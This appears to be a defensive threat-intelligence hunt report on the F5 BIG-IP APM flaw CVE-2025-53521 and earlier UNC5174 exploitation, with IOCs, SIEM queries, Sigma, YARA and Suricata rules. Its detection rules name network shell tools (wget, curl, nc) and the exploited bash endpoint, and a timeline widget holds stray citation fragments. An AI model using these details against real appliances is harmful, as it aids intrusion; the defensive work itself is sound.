Reports/CVE-2025-53521: Critical F5 BIG-IP APM Flaw Hits Defense and Healthcare Networks as CISA Issues Emergency Deadlines

CVE-2025-53521: Critical F5 BIG-IP APM Flaw Hits Defense and Healthcare Networks as CISA Issues Emergency Deadlines

Threat InteltacticalF5 BIG-IPCVE-2025-53521CISA KEVUNC5174hunt-report

March 28, 20264,217 words~17 min read

F5 BIG-IP APM Under Active Exploitation: Urgent Patch Required

CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities catalog on March 27, 2026, giving Federal Civilian Executive Branch agencies until Monday, March 30 to apply fixes [1][2]. The urgency is warranted: the vulnerability was originally classified as a denial-of-service issue in October 2025, but F5 reclassified it as unauthenticated remote code execution in March 2026 after obtaining new information about active exploitation [1].

The flaw carries a CVSS v3.1 score of 9.8 and a CVSS v4.0 score of 9.3 [1]. Security researchers reported acute scanning activity targeting vulnerable F5 BIG-IP devices following the KEV addition [2]. Organizations running BIG-IP Access Policy Manager need to treat this as a priority-one action item.

Background: What CVE-2025-53521 Actually Does

CVE-2025-53521 affects F5 BIG-IP Access Policy Manager (APM) versions 17.5.0 through 17.5.1, 17.1.0 through 17.1.2, 16.1.0 through 16.1.6, and 15.1.0 through 15.1.10 [1]. When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to remote code execution [1].

The reclassification timeline matters. For roughly five months, between October 2025 and March 2026, organizations that triaged this as a DoS-only issue may have deprioritized patching. F5's advisory does not say when the exploitation began, only that it was discovered in March 2026 [1]. As one researcher stated: "What we're observing now is pre-auth remote code execution and evidence of in-the-wild exploitation" [2].

BIG-IP APM is commonly deployed as the front door for remote access and VPN services. A pre-auth RCE on these appliances gives an attacker root-level access to a device that sits directly in the authentication path for sensitive internal resources.

Technical Detail: How CVE-2025-53521 Works

When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to remote code execution [1][2]. The vulnerability requires no credentials and no prior access. The attacker only needs network reachability to a virtual server with an APM access policy attached.

F5 has detected the threat actor making modifications that would affect the functioning of sys-eicheck, the BIG-IP system integrity checker [1]. The company also released mitigation.sh, a script to apply interim protections on systems that can't be patched immediately [1].

The pre-authentication nature targeting the data plane (virtual servers) rather than the management interface is the critical differentiator. This means the attack surface includes any BIG-IP APM virtual server reachable from untrusted networks.

UNC5174: Chinese State-Sponsored Exploitation of F5 Infrastructure

Active exploitation of F5 BIG-IP isn't new, and the threat actor profile is worth understanding for defenders prioritizing their response. Mandiant observed UNC5174 exploiting CVE-2023-46747, which allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user [3]. Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands [3].

UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation [3]. The vulnerability involves Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands [3]. Notably, UNC5174 attempted to self-patch the vulnerability using an F5-provided mitigation script, assessed as an attempt to limit subsequent exploitation by additional unrelated threat actors [3].

F5 Source Code Theft and Zero-Day Risk

A separate but related concern: CISA issued Emergency Directive 26-01 after a nation-state affiliated cyber threat actor compromised F5's systems and exfiltrated files, which included a portion of its BIG-IP source code and vulnerability information [4]. The threat actor's access to F5's proprietary source code could provide a technical advantage to exploit F5 devices through static and dynamic analysis for identification of logical flaws and zero-day vulnerabilities [4].

This means defenders should expect a continued pipeline of F5 vulnerabilities being discovered and weaponized by state-sponsored actors. The directive required agencies to inventory all F5 BIG-IP products and update instances by October 22, 2025 [4]. Resecurity linked this source code theft to campaigns deploying the BRICKSTORM backdoor, a Go-based ELF backdoor [6].

IOC Table

Type	Value	Context	Source
IP	`61.239.68.73`	Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747	[3]
Malware	`SNOWLIGHT`	C-based ELF downloader used by UNC5174	[3]
Malware	`GOREVERSE`	GoLang reverse shell backdoor	[3]
Malware	`GOHEAVY`	GoLang tunneling tool for lateral movement	[3]
Malware	`SUPERSHELL`	C2 framework used by UNC5174	[3]
Malware	`BRICKSTORM`	Go ELF backdoor with components Pg_update and Listener	[6]
Filename	`mitigation.sh`	F5-provided mitigation script	[1]
Filename	`/tmp/ss`	Reconnaissance tool downloaded to compromised systems	[3]
Filename	`Pg_update`	BRICKSTORM backdoor system/update helper	[6]
Filename	`Listener`	BRICKSTORM component for C2/socket handling	[6]
Filename	`sys-eicheck`	BIG-IP system integrity checker targeted for modification	[4]
URL	`/mgmt/tm/util/bash`	API endpoint for command execution when auth is bypassed	[5]
URL	`/tmui`	Handler code path for CVE-2023-46747 exploitation	[5]

MITRE ATT&CK Mapping

Technique ID	Name	Relevance
T1190	Exploit Public-Facing Application	Direct exploitation of BIG-IP APM virtual servers and TMUI [1][3][5]
T1059	Command and Scripting Interpreter	Bash command execution via compromised BIG-IP systems [3][5]
T1071	Application Layer Protocol	BRICKSTORM uses encrypted WebSocket connections for C2 [6]
T1105	Ingress Tool Transfer	Download of reconnaissance tools to `/tmp/ss` and deployment of malware [3]
T1562	Impair Defenses	UNC5174 self-patching vulnerabilities to lock out other actors; modification of sys-eicheck integrity checker [3][4]
T1027	Obfuscated Files or Information	Fileless payload delivery methods observed in campaigns

Detection and Hunting

Network-level indicators:

Monitor for scanning activity against BIG-IP APM virtual servers, particularly from unfamiliar external sources. Researchers confirmed acute scanning activity following the KEV addition [2].
Alert on connections to or from 61.239.68.73 [3].
Inspect traffic to BIG-IP APM virtual servers for anomalous payloads that don't match expected authentication workflows.

Host-level indicators on BIG-IP appliances:

Look for unexpected files in /tmp/, specifically /tmp/ss [3].
Audit for modifications to sys-eicheck, the BIG-IP system integrity checker [4].
Search for unexpected binaries named Pg_update, Listener, or Vmprotect in system paths and /etc/sysconfig/ [6].
Review recently created administrative accounts on BIG-IP systems, a known UNC5174 TTP following exploitation [3].

SIEM/Log queries:

index=network dest_ip=61.239.68.73 for C2 traffic detection.
index=web uri_path="/mgmt/tm/util/bash" method=POST for CVE-2023-46747 exploitation attempts against management interfaces [5].
Monitor BIG-IP audit logs for new user creation events and privilege escalation, particularly from non-standard source IPs.

Sector Impact Assessment

Defense and Intelligence: BIG-IP APM is widely used to broker VPN and remote access to sensitive environments. UNC5174's documented interest in selling access to U.S. defense contractor appliances [3] makes this a direct threat to the defense industrial base. The theft of F5 source code by a nation-state actor [4] compounds the risk by enabling targeted zero-day development against these specific deployments.

Healthcare: Hospitals and health systems use BIG-IP APM for clinician remote access, patient portal authentication, and inter-facility connectivity. A compromised APM appliance provides access to sensitive healthcare data. Healthcare organizations subject to HIPAA should treat an unpatched BIG-IP APM as a reportable risk.

Financial Services and Government: Both sectors deploy BIG-IP extensively for application delivery and load balancing. Federal agencies are already under CISA's emergency directive timeline [4]. Financial institutions should apply equivalent urgency given the pre-auth nature of CVE-2025-53521.

Other Recent F5 Vulnerabilities Worth Tracking

CVE-2025-53521 is the most urgent current threat, but it exists in a broader pattern of serious F5 vulnerabilities. CVE-2023-46747, the authentication bypass via request smuggling in BIG-IP TMUI, allows unauthenticated remote attackers to execute arbitrary commands as root and was exploited by UNC5174 starting in October 2023 [3][5]. CISA's Emergency Directive 26-01, issued in response to F5 source code theft, signals an expectation that additional zero-days targeting BIG-IP are likely in development [4].

🐑

Red Sheep Assessment

Confidence: High

The convergence of three factors creates a compounding risk for F5 BIG-IP customers that goes beyond any single CVE. First, CVE-2025-53521 provides unauthenticated access through the data plane, not the management interface. This dramatically expands the attack surface compared to previous F5 vulnerabilities. Second, a nation-state actor possesses F5's proprietary source code [4], which likely accelerated the discovery of this vulnerability and will accelerate discovery of future ones. Third, Chinese state-sponsored actors have an established operational playbook for F5 exploitation, complete with tooling (SNOWLIGHT, BRICKSTORM) and a commercial motivation to broker access [3].

The five-month gap between the initial DoS classification and the RCE reclassification of CVE-2025-53521 is a significant detail. Organizations that used automated vulnerability management tools likely deprioritized this CVE during that period based on its original severity rating. Threat actors may have been exploiting it as an RCE well before F5's March 2026 reclassification. The compressed CISA deadline suggests the government has intelligence about exploitation scope that hasn't been made public.

Defenders should plan for a sustained campaign of F5 zero-days. The source code theft provides a structural advantage to the threat actor that won't diminish with any single patch cycle.

🛡️

Defender's Checklist

▢[ ] Inventory all F5 BIG-IP APM instances and verify whether access policies are configured on virtual servers. Patch CVE-2025-53521 immediately or apply mitigation.sh as an interim measure [1].
▢[ ] Hunt for indicators on all BIG-IP APM systems. Run find / -name "ss" -path "/tmp/*" and review F5's iHealth diagnostic tool output [1].
▢[ ] Block inbound and outbound traffic to 61.239.68.73 at the perimeter and monitor DNS/proxy logs for connections to this address [3].
▢[ ] Audit BIG-IP administrative accounts for unauthorized additions. Query tmsh list auth user and compare against a known-good baseline, focusing on accounts created since October 2025 [3].
▢[ ] Verify that BIG-IP management interfaces (/tmui, /mgmt/tm/) are not accessible from untrusted networks. Restrict management access to a dedicated out-of-band management VLAN with MFA-enforced jump hosts [5].

References

Help Net Security, "Attackers are exploiting RCE vulnerability in BIG-IP APM systems (CVE-2025-53521)," March 28, 2026. https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
The Hacker News, "CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation," March 28, 2026. https://thehackernews.com/2026/03/cisa-adds-cve-2025-53521-to-kev-after.html
Google Cloud / Mandiant, "Bringing Access Back: Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect." https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect
CISA, "ED 26-01: Mitigate Vulnerabilities in F5 Devices." https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices
Praetorian, "Refresh: Compromising F5 BIG-IP With Request Smuggling | CVE-2023-46747." https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
Resecurity, "F5 BIG-IP Source Code Leak Tied to BRICKSTORM Backdoor." https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor
News4Hackers, "CVE-2025-53521 F5 BIG-IP APM Exploitation." https://www.news4hackers.com/big-ip-apm-remote-code-execution-vulnerability-exploited-by-attackers-cve-2025-53521

📊

Visual Intelligence

Timeline (4 events)

Oct 22, 2025

This means defenders should expect a continued pipeline of F5 vulnerabilities being discovered and weaponized by state-sponsored actors. <cite index="31-6,31-13">The directive required agencies to inv

cyber

Conti

Mar 27, 2026

<cite index="1-10">CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities catalog on March 27, 2026, giving Federal Civilian Executive Branch agencies until Monday, March 30 to apply fixes.

cyber

CISA

Mar 28, 2026

Help Net Security, "Attackers are exploiting RCE vulnerability in BIG-IP APM systems (CVE-2025-53521)," March 28, 2026. https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-535

cyber

Mar 28, 2026

The Hacker News, "CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation," March 28, 2026. https://thehackernews.com/2026/03/cisa-adds-cve-2025-53521-to-kev-after.html 3.

cyber

CISA

Entity Graph (10 entities, 19 relationships)

cve organization malware country ip

Diamond Model

Adversary

Unknown

Capability

CVE-2025-53521 CVE-2023-46747 BRICKSTORM

Infrastructure

61.239.68.73

Victim

CISA Mandiant Socket Google

Relationships

victim → capability: affected_by (CISA, CVE-2025-53521)

capability → victim: targeted_by (BRICKSTORM, Socket)

---

Hunt Guide: Hunt Report: CVE-2025-53521 F5 BIG-IP APM Remote Code Execution

Hypothesis: If threat actors are exploiting CVE-2025-53521 or related F5 vulnerabilities in our environment, we expect to observe unauthorized administrative account creation, suspicious files in /tmp/, modifications to sys-eicheck, and C2 communications to known malicious infrastructure in F5 BIG-IP logs, network traffic, and host artifacts.

Intelligence Summary: CVE-2025-53521 is a critical unauthenticated remote code execution vulnerability in F5 BIG-IP APM (CVSS 9.8) being actively exploited in the wild. The vulnerability was reclassified from DoS to RCE in March 2026 after F5 discovered active exploitation, with CISA adding it to KEV and mandating federal agencies patch by March 30, 2026. Chinese state-sponsored actor UNC5174 has previously exploited similar F5 vulnerabilities and possesses stolen F5 source code.

Confidence: High | Priority: Critical

Scope

Networks: All F5 BIG-IP APM appliances (versions 17.5.0-17.5.1, 17.1.0-17.1.2, 16.1.0-16.1.6, 15.1.0-15.1.10), particularly those with virtual servers exposed to untrusted networks
Timeframe: October 2025 to present (CVE was initially misclassified as DoS, actual RCE exploitation may have begun earlier)
Priority Systems: Internet-facing F5 BIG-IP APM devices, VPN concentrators, authentication gateways for healthcare/defense networks, any F5 device with access to sensitive internal resources

MITRE ATT&CK Techniques

T1190 — Exploit Public-Facing Application (Initial Access) [P1]

Exploitation of CVE-2025-53521 in F5 BIG-IP APM virtual servers for unauthenticated remote code execution

Splunk SPL:

index=f5_bigip OR index=network sourcetype=f5:bigip:asm:syslog OR sourcetype=f5:bigip:ltm:log | eval suspicious_uri=if(match(uri, "(?i)(eval|exec|system|shell|cmd|bash|powershell)"), 1, 0) | where suspicious_uri=1 OR http_status>=500 | stats count by src_ip, dest_ip, uri, http_status, _time | where count>10

Elastic KQL:

(source:"f5-bigip" OR tags:"f5") AND (http.response.status_code:>=500 OR url.path:(*eval* OR *exec* OR *system* OR *shell* OR *cmd* OR *bash*))

Sigma Rule:

title: F5 BIG-IP APM Exploitation Attempt
id: a7c4f8e2-3b91-4d5a-9c17-8e4f5d3a2b1c
status: experimental
description: Detects potential exploitation attempts against F5 BIG-IP APM
references:
  - https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.53521
logsource:
  product: f5
  service: bigip
detection:
  selection_status:
    http_status:
      - 500
      - 502
      - 503
  selection_suspicious_uri:
    uri|contains:
      - 'eval'
      - 'exec'
      - 'system'
      - 'bash'
      - 'cmd'
  condition: selection_status or selection_suspicious_uri
falsepositives:
  - Legitimate administrative activity
  - Application errors
level: high

Monitor for HTTP 500 errors and suspicious URI patterns indicating command injection. Baseline normal APM traffic patterns to reduce false positives.

T1059 — Command and Scripting Interpreter (Execution) [P1]

Execution of bash commands via compromised F5 BIG-IP systems, particularly through /mgmt/tm/util/bash endpoint

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:audit OR sourcetype=f5:bigip:asm:syslog | search (uri="/mgmt/tm/util/bash" AND method="POST") OR (command="*bash*" OR command="*sh -c*" OR command="*/tmp/*") | table _time src_ip user command uri method | dedup src_ip

Elastic KQL:

(source:"f5-bigip-audit" OR tags:"f5-audit") AND (url.path:"/mgmt/tm/util/bash" OR process.command_line:(*bash* OR *sh -c* OR */tmp/*))

Sigma Rule:

title: F5 BIG-IP Suspicious Command Execution
id: b8d4f7e3-4c92-5e6b-0d28-9e5f6e4b3c2d
status: experimental
description: Detects suspicious command execution on F5 BIG-IP systems
references:
  - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.execution
  - attack.t1059
logsource:
  product: f5
  service: audit
detection:
  selection_bash_endpoint:
    uri: '/mgmt/tm/util/bash'
    method: 'POST'
  selection_suspicious_commands:
    command|contains:
      - 'wget'
      - 'curl'
      - 'nc '
      - 'ncat'
      - '/tmp/'
      - 'base64'
      - 'python'
  condition: selection_bash_endpoint or selection_suspicious_commands
falsepositives:
  - Legitimate administrative scripts
level: high

Focus on commands executed through management API endpoints and any processes spawned from web service contexts

T1562.001 — Disable or Modify Tools (Defense Evasion) [P1]

Modification of sys-eicheck integrity checker and self-patching of vulnerabilities to prevent other actors

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:system OR sourcetype=linux_secure | search (file="*sys-eicheck*" OR process="*eicheck*" OR file="*mitigation.sh*") AND (action="modify" OR action="write" OR command="*chmod*" OR command="*chattr*") | stats count by file, process, user, src_ip | where user!="root" OR src_ip!="127.0.0.1"

Elastic KQL:

(source:"f5-bigip" OR system.auth.program:"sys-eicheck") AND (file.path:*sys-eicheck* OR process.name:*eicheck* OR file.name:"mitigation.sh") AND (event.action:("modify" OR "write" OR "chmod" OR "chattr"))

Alert on any modifications to sys-eicheck or unexpected execution of mitigation scripts from non-standard locations

T1136.001 — Create Account: Local Account (Persistence) [P1]

Creation of unauthorized administrative accounts on compromised F5 BIG-IP systems

Splunk SPL:

index=f5_bigip sourcetype=f5:bigip:audit | search (command="create" OR command="modify") AND (object_type="user" OR path="/auth/user/*") | regex user!="(admin|root|f5admin)" | table _time, src_ip, user, created_user, role | sort - _time

Elastic KQL:

(source:"f5-bigip-audit") AND (event.action:("create" OR "user-create" OR "user-add")) AND (object.type:"user" OR url.path:"/auth/user/*")

Baseline authorized admin accounts and alert on any new privileged user creation, especially from external IPs

T1071.001 — Application Layer Protocol: Web Protocols (Command and Control) [P2]

BRICKSTORM backdoor uses encrypted WebSocket connections for C2 communications

Splunk SPL:

index=network OR index=proxy | search (dest_ip="61.239.68.73" OR src_ip="61.239.68.73") OR (protocol="websocket" OR uri="*ws://*" OR uri="*wss://*") | stats count by src_ip, dest_ip, dest_port, protocol | where count>50

Elastic KQL:

(destination.ip:"61.239.68.73" OR source.ip:"61.239.68.73") OR (network.protocol:"websocket" OR url.scheme:("ws" OR "wss"))

Monitor for persistent WebSocket connections to unusual external IPs, especially from F5 appliances

T1105 — Ingress Tool Transfer (Command and Control) [P2]

Download of reconnaissance tools and malware to compromised systems, particularly to /tmp/ directory

Splunk SPL:

index=f5_bigip OR index=linux_secure | search (file="/tmp/*" AND (action="create" OR action="write")) OR (command="*wget*" OR command="*curl*" OR command="*scp*") | regex file!="\.(log|tmp|pid)$" | table _time, host, file, size, user, process | where size>1000

Elastic KQL:

(file.path:"/tmp/*" AND event.action:("creation" OR "write")) OR (process.command_line:(*wget* OR *curl* OR *scp*) AND NOT file.extension:("log" OR "tmp" OR "pid"))

Focus on executable files or scripts created in /tmp/, especially named 'ss' or containing Go/ELF binaries

Indicators of Compromise

Type	Value	Context
ip	`61.239.68.73`	Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747
filename	`/tmp/ss`	Reconnaissance tool downloaded to compromised F5 BIG-IP systems by UNC5174
filename	`mitigation.sh`	F5-provided mitigation script, but also used by UNC5174 to self-patch vulnerabilities
filename	`sys-eicheck`	BIG-IP system integrity checker targeted for modification by threat actors
filename	`Pg_update`	BRICKSTORM backdoor component used as system/update helper
filename	`Listener`	BRICKSTORM backdoor component for C2/socket handling
url	`/mgmt/tm/util/bash`	API endpoint for command execution when authentication is bypassed
url	`/tmui`	Handler code path for CVE-2023-46747 exploitation

IOC Sweep Queries (Splunk):

index=* (dest_ip="61.239.68.73" OR src_ip="61.239.68.73" OR query="61.239.68.73") | stats count by index, sourcetype, src_ip, dest_ip, dest_port | sort - count

index=* (file="/tmp/ss" OR filename="ss" OR process="/tmp/ss" OR command="*/tmp/ss*") | stats count by host, file, process, user | sort - count

index=* (file="*mitigation.sh" OR process="*mitigation.sh" OR command="*mitigation.sh*") | stats count by host, file, user, src_ip | sort - count

index=* (file="*sys-eicheck*" OR process="*sys-eicheck*" OR command="*eicheck*") | search action!="read" | stats count by host, file, action, user | sort - count

index=* (file="*Pg_update*" OR process="*Pg_update*" OR filename="Pg_update") | stats count by host, file, path, hash | sort - count

index=* (file="*Listener" OR process="*Listener" OR filename="Listener") | search file!="*.dll" AND file!="*.exe" | stats count by host, file, path, hash | sort - count

index=* (uri="/mgmt/tm/util/bash" OR url="*/mgmt/tm/util/bash" OR cs_uri_stem="/mgmt/tm/util/bash") | search method="POST" | stats count by src_ip, dest_ip, status, user_agent | sort - count

index=* (uri="/tmui*" OR url="*/tmui*" OR cs_uri_stem="/tmui*") | search status>=400 OR bytes_out>10000 | stats count by src_ip, uri, status, bytes_out | sort - count

YARA Rules

BRICKSTORM_Backdoor — Detects BRICKSTORM Go-based ELF backdoor components

rule BRICKSTORM_Backdoor {
    meta:
        description = "Detects BRICKSTORM backdoor components used in F5 BIG-IP exploitation"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
        reference = "https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor"
        hash1 = "unknown"
    
    strings:
        $s1 = "Pg_update" fullword ascii
        $s2 = "Listener" fullword ascii
        $s3 = "Vmprotect" fullword ascii
        $s4 = "/etc/sysconfig/" ascii
        $go1 = "Go build ID:" ascii
        $go2 = "runtime.gopanic" ascii
        $elf = { 7F 45 4C 46 }
        $websocket1 = "websocket" ascii
        $websocket2 = "ws://" ascii
        $websocket3 = "wss://" ascii
    
    condition:
        $elf at 0 and
        (
            2 of ($s*) or
            (1 of ($s*) and 2 of ($go*) and 1 of ($websocket*))
        )
}

F5_BIGIP_Exploitation_Artifacts — Detects artifacts of F5 BIG-IP exploitation including UNC5174 tools

rule F5_BIGIP_Exploitation_Artifacts {
    meta:
        description = "Detects artifacts from F5 BIG-IP exploitation campaigns"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
        reference = "CVE-2025-53521, CVE-2023-46747"
    
    strings:
        $tool1 = "/tmp/ss" fullword ascii
        $tool2 = "SNOWLIGHT" ascii
        $tool3 = "GOREVERSE" ascii
        $tool4 = "GOHEAVY" ascii
        $tool5 = "SUPERSHELL" ascii
        $cmd1 = "tmsh list auth user" ascii
        $cmd2 = "/mgmt/tm/util/bash" ascii
        $cmd3 = "sys-eicheck" ascii
        $f5_1 = "BIG-IP" ascii nocase
        $f5_2 = "F5 Networks" ascii
        $exploit1 = "/tmui/" ascii
        $exploit2 = "Apache JServ Protocol" ascii
    
    condition:
        (
            any of ($tool*) or
            (2 of ($cmd*) and 1 of ($f5_*)) or
            (1 of ($exploit*) and 1 of ($f5_*))
        )
}

Suricata Rules

SID 1000001 — Detects potential CVE-2025-53521 F5 BIG-IP APM exploitation attempt

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP APM CVE-2025-53521 Exploitation Attempt"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; content:"command"; http_client_body; depth:20; reference:cve,2025-53521; classtype:attempted-admin; sid:1000001; rev:1;)

SID 1000002 — Detects connection to UNC5174 C2 infrastructure

alert ip any any -> 61.239.68.73 any (msg:"ET MALWARE UNC5174 C2 Communication to Known Bad IP"; reference:url,cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect; classtype:trojan-activity; sid:1000002; rev:1;)

SID 1000003 — Detects F5 BIG-IP TMUI exploitation via CVE-2023-46747

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP TMUI CVE-2023-46747 Request Smuggling Attempt"; flow:established,to_server; content:"/tmui/"; http_uri; content:"Content-Length:"; http_header; pcre:"/Content-Length:\s*[0-9]+[\r\n]+.*Content-Length:/smi"; reference:cve,2023-46747; classtype:web-application-attack; sid:1000003; rev:1;)

SID 1000004 — Detects BRICKSTORM backdoor WebSocket communication

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE BRICKSTORM Backdoor WebSocket C2 Communication"; flow:established,to_server; content:"GET"; depth:4; content:"Upgrade|3a 20|websocket"; http_header; content:"Connection|3a 20|Upgrade"; http_header; content:"Sec-WebSocket"; http_header; threshold:type limit,track by_src,count 1,seconds 3600; reference:url,resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor; classtype:trojan-activity; sid:1000004; rev:1;)

Data Source Requirements

Source	Required For	Notes
F5 BIG-IP logs	T1190, T1059, T1562.001, T1136.001	Enable audit logging and ASM security logging on all F5 devices. Configure remote syslog to SIEM.
Network traffic logs	T1190, T1071.001, T1105	Full packet capture or NetFlow/IPFIX data for F5 management and data plane interfaces
DNS logs	T1071.001	DNS query logging to detect C2 domain resolution
File integrity monitoring	T1562.001, T1105	Monitor /tmp/, /etc/sysconfig/, and F5 system directories for unauthorized changes
Process execution logs	T1059, T1105	Linux auditd or equivalent on F5 appliances to capture command execution

Sources

Found this useful?

Related Reports

Threat IntelApril 10, 2026

Unpatched Adobe Reader Zero-Day Exploited for Months via Weaponized PDFs Targeting Energy and Government Sectors

tacticaladobe-reader

Threat IntelApril 10, 2026

Why Your Security Team Is Blind Without Comprehensive Log Collection

threat detectionsiem

Threat IntelApril 9, 2026

Pacific Crosshairs: Chinese APT Groups and the Cyber Siege on America's Naval Shipyards

tacticalChinese APT

← All Reports

Reports/CVE-2025-53521: Critical F5 BIG-IP APM Flaw Hits Defense and Healthcare Networks as CISA Issues Emergency Deadlines

CVE-2025-53521: Critical F5 BIG-IP APM Flaw Hits Defense and Healthcare Networks as CISA Issues Emergency Deadlines

Threat InteltacticalF5 BIG-IPCVE-2025-53521CISA KEVUNC5174hunt-report

March 28, 20264,217 words~17 min read

F5 BIG-IP APM Under Active Exploitation: Urgent Patch Required

Background: What CVE-2025-53521 Actually Does

Technical Detail: How CVE-2025-53521 Works

UNC5174: Chinese State-Sponsored Exploitation of F5 Infrastructure

F5 Source Code Theft and Zero-Day Risk

IOC Table

Type	Value	Context	Source
IP	`61.239.68.73`	Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747	[3]
Malware	`SNOWLIGHT`	C-based ELF downloader used by UNC5174	[3]
Malware	`GOREVERSE`	GoLang reverse shell backdoor	[3]
Malware	`GOHEAVY`	GoLang tunneling tool for lateral movement	[3]
Malware	`SUPERSHELL`	C2 framework used by UNC5174	[3]
Malware	`BRICKSTORM`	Go ELF backdoor with components Pg_update and Listener	[6]
Filename	`mitigation.sh`	F5-provided mitigation script	[1]
Filename	`/tmp/ss`	Reconnaissance tool downloaded to compromised systems	[3]
Filename	`Pg_update`	BRICKSTORM backdoor system/update helper	[6]
Filename	`Listener`	BRICKSTORM component for C2/socket handling	[6]
Filename	`sys-eicheck`	BIG-IP system integrity checker targeted for modification	[4]
URL	`/mgmt/tm/util/bash`	API endpoint for command execution when auth is bypassed	[5]
URL	`/tmui`	Handler code path for CVE-2023-46747 exploitation	[5]

MITRE ATT&CK Mapping

Technique ID	Name	Relevance
T1190	Exploit Public-Facing Application	Direct exploitation of BIG-IP APM virtual servers and TMUI [1][3][5]
T1059	Command and Scripting Interpreter	Bash command execution via compromised BIG-IP systems [3][5]
T1071	Application Layer Protocol	BRICKSTORM uses encrypted WebSocket connections for C2 [6]
T1105	Ingress Tool Transfer	Download of reconnaissance tools to `/tmp/ss` and deployment of malware [3]
T1562	Impair Defenses	UNC5174 self-patching vulnerabilities to lock out other actors; modification of sys-eicheck integrity checker [3][4]
T1027	Obfuscated Files or Information	Fileless payload delivery methods observed in campaigns

Detection and Hunting

Network-level indicators:

Monitor for scanning activity against BIG-IP APM virtual servers, particularly from unfamiliar external sources. Researchers confirmed acute scanning activity following the KEV addition [2].
Alert on connections to or from 61.239.68.73 [3].
Inspect traffic to BIG-IP APM virtual servers for anomalous payloads that don't match expected authentication workflows.

Host-level indicators on BIG-IP appliances:

Look for unexpected files in /tmp/, specifically /tmp/ss [3].
Audit for modifications to sys-eicheck, the BIG-IP system integrity checker [4].
Search for unexpected binaries named Pg_update, Listener, or Vmprotect in system paths and /etc/sysconfig/ [6].
Review recently created administrative accounts on BIG-IP systems, a known UNC5174 TTP following exploitation [3].

SIEM/Log queries:

index=network dest_ip=61.239.68.73 for C2 traffic detection.
index=web uri_path="/mgmt/tm/util/bash" method=POST for CVE-2023-46747 exploitation attempts against management interfaces [5].
Monitor BIG-IP audit logs for new user creation events and privilege escalation, particularly from non-standard source IPs.

Sector Impact Assessment

Other Recent F5 Vulnerabilities Worth Tracking

🐑

Red Sheep Assessment

Confidence: High

Defenders should plan for a sustained campaign of F5 zero-days. The source code theft provides a structural advantage to the threat actor that won't diminish with any single patch cycle.

🛡️

Defender's Checklist

▢[ ] Inventory all F5 BIG-IP APM instances and verify whether access policies are configured on virtual servers. Patch CVE-2025-53521 immediately or apply mitigation.sh as an interim measure [1].
▢[ ] Hunt for indicators on all BIG-IP APM systems. Run find / -name "ss" -path "/tmp/*" and review F5's iHealth diagnostic tool output [1].
▢[ ] Block inbound and outbound traffic to 61.239.68.73 at the perimeter and monitor DNS/proxy logs for connections to this address [3].
▢[ ] Audit BIG-IP administrative accounts for unauthorized additions. Query tmsh list auth user and compare against a known-good baseline, focusing on accounts created since October 2025 [3].
▢[ ] Verify that BIG-IP management interfaces (/tmui, /mgmt/tm/) are not accessible from untrusted networks. Restrict management access to a dedicated out-of-band management VLAN with MFA-enforced jump hosts [5].

References

Help Net Security, "Attackers are exploiting RCE vulnerability in BIG-IP APM systems (CVE-2025-53521)," March 28, 2026. https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
The Hacker News, "CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation," March 28, 2026. https://thehackernews.com/2026/03/cisa-adds-cve-2025-53521-to-kev-after.html
Google Cloud / Mandiant, "Bringing Access Back: Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect." https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect
CISA, "ED 26-01: Mitigate Vulnerabilities in F5 Devices." https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices
Praetorian, "Refresh: Compromising F5 BIG-IP With Request Smuggling | CVE-2023-46747." https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
